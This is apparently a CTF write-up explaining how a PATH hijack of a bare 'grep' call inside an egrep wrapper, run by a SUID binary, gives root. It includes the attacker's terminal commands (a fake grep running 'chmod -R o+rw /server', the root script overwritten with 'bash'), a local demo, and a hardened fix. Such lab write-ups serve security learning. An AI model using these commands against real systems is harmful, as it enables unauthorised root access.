HN0x03 | Escalade comme un Yamakasi - StupidAdminSys
This challenge is a part of the Hacky’Nov 0x03 CTF.
Goal
Bypass the shell script to get root access.
Walkthrough
We are given a shell script, /server/youarenothing.sh:
#!/bin/bash
# Grab the last "inet a.b.c.d" from "ip a" and keep only the address.
# Note: /bin/egrep is called by absolute path, but egrep is itself a wrapper.
IP_USER=$(/bin/ip a | /bin/egrep -o 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}'| /bin/tail -n 1 | /bin/awk '{ print $2 }')
# "The command does not contain a valid IP address."
# (-n on an unquoted single token is true whether or not IP_USER is empty.)
if [ -n $IP_USER ]; then
/bin/echo "La commande ne contient pas une adresse IP valide."
exit 1
fi
# "You are using a secure IP." -> switch to the secureip user
if [ "$IP_USER" = "127.0.0.1" ]; then
/bin/echo "Vous utilisez une IP sécurisée."
/bin/su - secureip
else
# "If you do not switch to a secure IP quickly, I will notice and delete your machine."
/bin/echo "Si vous n'utilisez pas rapidement une IP sécurisée, je m'en rendrai compte et je supprimerai votre machine."
exit 1
fi
which we can execute as root through the SUID binary /server/executemebecauseyouarenothing.
As for the previous challenge, I obsessed over trying to bypass the script instead of trying to find a way to execute commands as root.
I first tried various methods to change the value of IP_USER, but since we cannot edit IP addresses without being root, it was a dead end. I then again (yes, don't ask me why I do that every time...) tried to bypass the test functions, but of course it also did not work...
Then I remembered that egrep is deprecated and that users should use grep -E instead. I simply read the file (/bin/egrep, the one the script calls) and saw:
#!/bin/sh
cmd=${0##*/}
exec grep -E "$@"
Of course, the hint has been removed; the "real" egrep looks like this (at least on my machine):
#!/bin/sh
cmd=${0##*/}
echo "$cmd: warning: $cmd is obsolescent; using grep -E" >&2
exec grep -E "$@"
Knowing that, we can hijack the grep command. The youarenothing.sh script calls every binary by absolute path, but the egrep wrapper it relies on calls grep by bare name, so that lookup goes through PATH. The SUID binary passes our environment, PATH included, through to the script, so a script named grep in a directory we put first in PATH is what the root-owned process executes instead of /bin/grep.
I first tried (yes, I'm really that dumb...) to fake the output so I could bypass the script checks, with no success. Then I found two brain cells and decided to spawn a shell instead:
youhavenorightsbeacauseyousuck@adef92e9a94b:~$ echo "chmod -R o+rw /server" > grep && chmod +x ./grep
youhavenorightsbeacauseyousuck@adef92e9a94b:~$ PATH="$(pwd):$PATH" /server/executemebecauseyouarenothing
youhavenorightsbeacauseyousuck@adef92e9a94b:~$ echo "bash" > /server/youarenothing.sh
youhavenorightsbeacauseyousuck@adef92e9a94b:~$ /server/executemebecauseyouarenothing
root@adef92e9a94b:~# cat /server/flag.txt
HNx03{0lw8s_Use_5tRaCe_T0_check_BINARY}
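The hijack above, reproduced locally without root as an added example (this is not code from the writeup or from the challenge files): a copy of the egrep shim is run once with a fake grep planted first in PATH, and once as a hardened variant that pins PATH before resolving any bare command. The wrapper names, the marker file and the sample "ip a" line are made up for the demo.

```shell
#!/bin/sh
# Added example (not part of the original writeup or challenge files):
# reproduce the PATH hijack locally, without root, and show the wrapper
# form that is immune to it. Names such as egrep_wrapper and the marker
# file are made up for this demo.
#
# The check the flag hints at, on the real target, would be:
#   strace -f -e trace=execve /server/executemebecauseyouarenothing
# which prints every execve(), including which "grep" the shim resolved.

demo_path_hijack() {
    work=$(mktemp -d)

    # Victim: same shape as the egrep shim in the writeup. "grep" is a bare
    # name, so the caller's PATH decides which file runs.
    cat > "$work/egrep_wrapper" <<'EOF'
#!/bin/sh
cmd=${0##*/}
exec grep -E "$@"
EOF
    chmod +x "$work/egrep_wrapper"

    # Hardened victim: PATH is pinned before any bare command is resolved.
    # Calling /bin/grep by absolute path would work just as well.
    cat > "$work/egrep_wrapper_fixed" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
cmd=${0##*/}
exec grep -E "$@"
EOF
    chmod +x "$work/egrep_wrapper_fixed"

    # Attacker: a fake grep placed first in PATH. The writeup's payload was
    # "chmod -R o+rw /server"; here it only drops a marker file.
    mkdir "$work/evil"
    cat > "$work/evil/grep" <<EOF
#!/bin/sh
echo hijacked > "$work/marker"
EOF
    chmod +x "$work/evil/grep"

    # Constructed sample input resembling one line of "ip a".
    printf 'inet 10.0.0.5/24\n' > "$work/input.txt"

    # 1. Vulnerable wrapper under the attacker's PATH: the fake grep runs.
    PATH="$work/evil:$PATH" "$work/egrep_wrapper" -o 'inet [0-9.]+' "$work/input.txt" >/dev/null 2>&1 || true
    if [ -f "$work/marker" ]; then vulnerable=yes; else vulnerable=no; fi
    rm -f "$work/marker"

    # 2. Hardened wrapper under the same PATH: the real grep runs instead.
    out=$(PATH="$work/evil:$PATH" "$work/egrep_wrapper_fixed" -o 'inet [0-9.]+' "$work/input.txt" 2>/dev/null || true)
    if [ ! -f "$work/marker" ] && [ "$out" = "inet 10.0.0.5" ]; then hardened=safe; else hardened=no; fi

    rm -rf "$work"
    echo "vulnerable=$vulnerable hardened=$hardened"
}

demo_path_hijack
```

Running it prints `vulnerable=yes hardened=safe`: the same attacker PATH that redirects the bare `grep` in the first wrapper has no effect once the script sets its own PATH. On a real target the equivalent fix belongs in the SUID program or the script it launches (a fixed PATH, or absolute paths all the way down), since anything the privileged process resolves by bare name is under the caller's control.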
I asked my friend LOLOLEKIK (who is also the author of this challenge) to explain the flag to me, because I did not see how strace was related since I solved it without even thinking of that command. He explained to me that he wanted users to use strace and see that the script used grep without an absolute path, so we could hijack it.
He wrote a blog post called Underlying Execution Hijacking that explains how you can find and exploit scripts and binaries that work like this one.